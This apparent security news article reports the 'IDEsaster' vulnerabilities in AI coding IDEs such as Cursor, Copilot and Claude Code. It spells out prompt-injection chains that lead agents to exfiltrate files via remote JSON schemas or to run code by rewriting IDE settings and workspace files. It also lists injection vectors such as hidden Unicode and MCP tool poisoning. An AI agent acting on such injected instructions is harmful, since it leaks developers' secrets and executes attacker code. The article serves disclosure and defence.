Over 30 Vulnerabilities Discovered in AI Coding Tools: Data Theft and Remote Code Execution

Author

NEXT2i

Date Published

A Major Threat to Modern Development Environments

On December 6, 2025, an alarming discovery shook the world of cybersecurity and software development. More than 30 security vulnerabilities were revealed in various AI-powered Integrated Development Environments (IDEs), potentially exposing millions of developers to risks of data theft and remote code execution.

These flaws, which combine prompt injection primitives with legitimate IDE features, were dubbed IDEsaster by security researcher Ari Marzouk (MaccariTA). They affect some of the most popular development tools used by programmers worldwide.

The Affected Tools: An Entire Ecosystem Compromised

The list of vulnerable platforms is particularly concerning as it includes some of the most widely used IDEs and extensions in the software development industry:

Major Compromised Tools

Cursor – A popular AI-powered IDE

Windsurf – Collaborative development platform

Kiro.dev – AI-assisted coding environment

GitHub Copilot – Microsoft's AI coding assistant

Zed.dev – Modern, high-performance code editor

Roo Code – AI code generation tool

Junie (JetBrains) – Extension for JetBrains IDEs

Cline – AI coding assistant

Claude Code – Anthropic's Claude-based development tool

In total, 24 of these vulnerabilities received CVE identifiers (Common Vulnerabilities and Exposures), highlighting the severity and official recognition of these security issues.

A Surprising Discovery: The Scale of the Problem

"I think the fact that several universal attack chains affected all tested AI IDEs is the most surprising discovery of this research," Ari Marzouk told The Hacker News.

The researcher highlights a crucial point: "All AI IDEs (and the coding assistants that integrate with them) effectively ignore the base software (IDE) in their threat model. They treat their features as inherently safe because they have existed for years. However, once you add AI agents capable of acting autonomously, the same features can be weaponized for data exfiltration and remote code execution primitives."

The Anatomy of an Attack: A Triple Threat

IDEsaster vulnerabilities rely on chaining three distinct attack vectors, all common in AI-powered IDEs:

1. Bypassing LLM GuardrailsThe first step involves bypassing the protections of a Large Language Model (LLM) to hijack the context and execute the attacker's instructions. This technique, known as prompt injection, allows a malicious actor to manipulate the behavior of the AI model.

2. Automatic Actions Without User InteractionModern AI agents can perform certain actions via pre-approved tool calls automatically, without requiring user intervention. This feature, designed to improve productivity, becomes an exploitable weakness when combined with other vulnerabilities.

3. Exploitation of Legitimate IDE FeaturesThe third component involves triggering legitimate IDE features that allow an attacker to cross the security boundary to exfiltrate sensitive data or execute arbitrary commands.

What Makes IDEsaster Unique

These vulnerabilities differ from previous attack chains that exploited prompt injections in conjunction with vulnerable tools. What makes IDEsaster particularly dangerous is that it takes prompt injection primitives and agent tools, using them to activate legitimate IDE functionalities to cause information leaks or command execution.

Context Injection Vectors

Context hijacking can be achieved in multiple ways:

User-added context references: Pasted URLs or text containing hidden characters invisible to the human eye but parsable by the LLM.

Poisoning via Model Context Protocol (MCP): Using an MCP server via tool poisoning or "rug pulls."

Attacker-controlled external sources: When a legitimate MCP server parses input controlled by the attacker.

Concrete Attack Examples: Real Scenarios

Attack 1: Data Exfiltration via JSON Schema

Affected Vulnerabilities: CVE-2025-49150 (Cursor), CVE-2025-53097 (Roo Code), CVE-2025-58335 (JetBrains Junie), GitHub Copilot, Kiro.dev, Claude Code.

Attack Method:

Use of prompt injection to read a sensitive file via a legitimate tool ("read_file") or a vulnerable one ("search_files" or "search_project").

Writing a JSON file via a legitimate tool ("write_file" or "edit_file") with a remote JSON schema hosted on a domain controlled by the attacker.

The IDE performs a GET request, causing data to leak to the attacker's server.

Attack 2: Code Execution via IDE Settings

Affected Vulnerabilities: CVE-2025-53773 (GitHub Copilot), CVE-2025-54130 (Cursor), CVE-2025-53536 (Roo Code), CVE-2025-55012 (Zed.dev), Claude Code.

Attack Method:

Prompt injection to modify IDE configuration files (.vscode/settings.json or .idea/workspace.xml).

Setting "php.validate.executablePath" or "PATH_TO_GIT" to the path of an executable file containing malicious code.

Automatic execution of the malicious code during certain IDE operations.

Attack 3: Code Execution via Workspace Configuration

Affected Vulnerabilities: CVE-2025-64660 (GitHub Copilot), CVE-2025-61590 (Cursor), CVE-2025-58372 (Roo Code).

Attack Method:

Prompt injection to modify workspace configuration files (*.code-workspace).

Overwriting multi-root workspace settings to execute arbitrary code.

Exploiting the fact that AI agents are configured by default to auto-approve file writes in the workspace.

This last attack is particularly insidious because it requires no user interaction nor the need to reopen the workspace for the malicious code to be executed.

Broader Context: A Wave of Vulnerabilities in AI Tools

The discovery of IDEsaster is part of a broader context of vulnerabilities recently discovered in AI-powered coding tools:

OpenAI Codex CLI (CVE-2025-61260): A command injection flaw in OpenAI Codex CLI exploits the fact that the program implicitly trusts commands configured via MCP server inputs and executes them at startup without asking for user permission. This can lead to arbitrary command execution when a malicious actor can alter the repository's .env and ./.codex/config.toml files.

Google Antigravity: Multiple Vulnerabilities: Several security issues were discovered in Google Antigravity, including indirect prompt injection (using a poisoned web source to manipulate Gemini to collect credentials and sensitive code from the user's IDE) and data exfiltration/RCE via malicious trusted workspaces embedding a persistent backdoor.

PromptPwnd: A New Vulnerability Class: A new category of vulnerability named PromptPwnd targets AI agents connected to vulnerable GitHub Actions (or GitLab CI/CD pipelines). Prompt injections are used to trick them into executing integrated privileged tools leading to information leaks or code execution.

Recommendations for Developers

Facing these threats, Ari Marzouk proposes several essential recommendations:

For AI IDE Users

Trust: Use AI IDEs only with trusted projects and files. Malicious rule files, instructions hidden in source code or other files (README), and even filenames can become prompt injection vectors.

MCP Servers: Connect only to trusted MCP servers. Continuously monitor these servers for modifications (even a trusted server can be compromised).

Data Flow: Review and understand the data flow of MCP tools. Manually examine added sources.

Sanitization: Verify URLs and other sources to detect hidden instructions (HTML comments, hidden CSS text, invisible Unicode characters, etc.).

For AI Agent and IDE Developers

Least Privilege: Apply the principle of least privilege to LLM tools.

Vectors: Minimize prompt injection vectors.

System Prompt: Strengthen the system prompt.

Sandboxing: Use sandboxing to execute commands.

Security Testing: Perform tests to detect path traversal, information leaks, and command injections.

The "Secure for AI" Concept

Marzouk highlights the importance of a new paradigm he calls "Secure for AI". This concept aims to tackle security challenges introduced by AI features, ensuring that products are not only secure by default and secure by design, but also designed considering how AI components can be exploited over time. "This is another example of why the 'Secure for AI' principle is necessary," stated Marzouk. "Connecting AI agents to existing applications (in my case, the IDE; in their case, GitHub Actions) creates new emerging risks."

Impact on Enterprises: An Expanded Attack Surface

While agentic AI tools are becoming increasingly popular in enterprise environments, these discoveries demonstrate how AI tools expand the attack surface of development machines. The main problem lies in an LLM's inability to distinguish between:

Instructions provided by a user to accomplish a task.

Content it may ingest from an external source, which may contain an embedded malicious prompt.

Supply Chain Risks

"Any repository using AI for issue triage, PR labeling, code suggestions, or automated responses is at risk," warned Rein Daelman, researcher at Aikido. Threats include prompt injection, command injection, secret exfiltration, repository compromise, and upstream supply chain compromise.

Most Vulnerable Use Cases

Some usage scenarios are particularly at risk:

Collaborative Development: Teams working on collaborative projects with pull requests and automated code reviews are particularly exposed. An attacker could inject malicious code via PR comments that will be processed by the AI agent.

CI/CD: Pipelines that use AI agents to automate deployment or testing tasks can be compromised, allowing an attacker to inject malicious code directly into production environments.

Automated Code Analysis: AI-powered code analysis tools that automatically scan repositories can be tricked into exfiltrating proprietary code or secrets to attacker-controlled servers.

Vendor Responses and Patches

Following these revelations, several vendors have reacted:

Claude Code (Anthropic): Anthropic published a security warning in its documentation, acknowledging the risks and providing guidelines for users to protect themselves.

Other Vendors: Many publishers have begun deploying security patches for the identified CVEs, although the process is still ongoing for several platforms.

Implications for the Future of AI-Assisted Development

This discovery raises important questions about the future of AI-assisted software development:

Need for a New Security Model: Traditional security models are no longer sufficient. IDEs and development tools must be redesigned considering the presence of autonomous AI agents capable of executing actions without direct supervision.

Tension between Productivity and Security: The automation provided by AI agents significantly improves developer productivity, but this convenience must not come at the expense of security. A balance must be found.

Training and Awareness: Developers must be trained on the specific risks related to AI-powered development tools. Understanding attack vectors like prompt injection is becoming an essential skill.

Evolution of Security Standards: Standards bodies and regulators will likely need to develop new frameworks and standards specifically adapted to the security of agentic AI systems.

Immediate Protection Measures

Pending full patches and long-term solutions, here are some measures organizations and developers can take immediately:

For Organizations

Tool Audit: Identify all AI IDEs and coding assistants used in the organization.

Usage Policy: Establish clear policies on the use of AI tools for development.

Monitoring: Implement monitoring of connections to MCP servers and unusual activities.

Isolation: Use isolated development environments for sensitive projects.

Training: Train teams on prompt injection risks and best practices.

For Individual Developers

Vigilance: Remain vigilant when adding external context to the AI.

Verification: Manually verify changes suggested by the AI before accepting them.

Limitation: Limit permissions granted to AI tools.

Updates: Keep all tools up to date with the latest security patches.

Sensitive Data Isolation: Avoid working on projects containing sensitive data with unsecured AI IDEs.

The Importance of Responsible Disclosure

It is important to note that these vulnerabilities were discovered and disclosed responsibly by Ari Marzouk. This approach allows vendors to develop and deploy patches before full technical details are made public, minimizing the window of opportunity for malicious actors.

Conclusion: A Turning Point for Development Tool Security

The discovery of IDEsaster marks a significant turning point in our understanding of the security of AI-powered development tools. These 30+ vulnerabilities reveal that integrating artificial intelligence into development environments creates entirely new attack vectors that did not exist before.

The key message is that features considered safe for years suddenly become attack primitives when combined with autonomous AI agents capable of acting without direct supervision. This reality requires a fundamental overhaul of our approach to development tool security.

Towards a Safer Future

For AI-powered development tools to reach their full potential while remaining safe, several evolutions are necessary:

Widespread adoption of the "Secure for AI" principle: Product developers must systematically consider how AI components can be exploited.

Industry-research collaboration: Security researchers and AI tool developers must work together to anticipate and prevent new classes of vulnerabilities.

Standards and regulations: Security frameworks specific to AI systems must be developed and adopted.

Continuous education: Developers must be continuously trained on new AI-related security risks.

A Call to Action

IDEsaster is not simply a list of bugs to fix. It is a wake-up call reminding us that integrating AI into our daily tools requires constant vigilance and a proactive approach to security. Developers, organizations, and tool vendors must all play their part to ensure that the AI revolution in software development proceeds securely.

The question is not whether we should adopt AI-powered development tools—this adoption is already underway and irreversible. The question is how we can do so safely, protecting our data, our code, and our systems against the new threats that accompany these powerful technologies.

Ari Marzouk's discoveries give us the knowledge needed to begin answering this question. It is now up to the entire software development community to take these warnings seriously and act accordingly.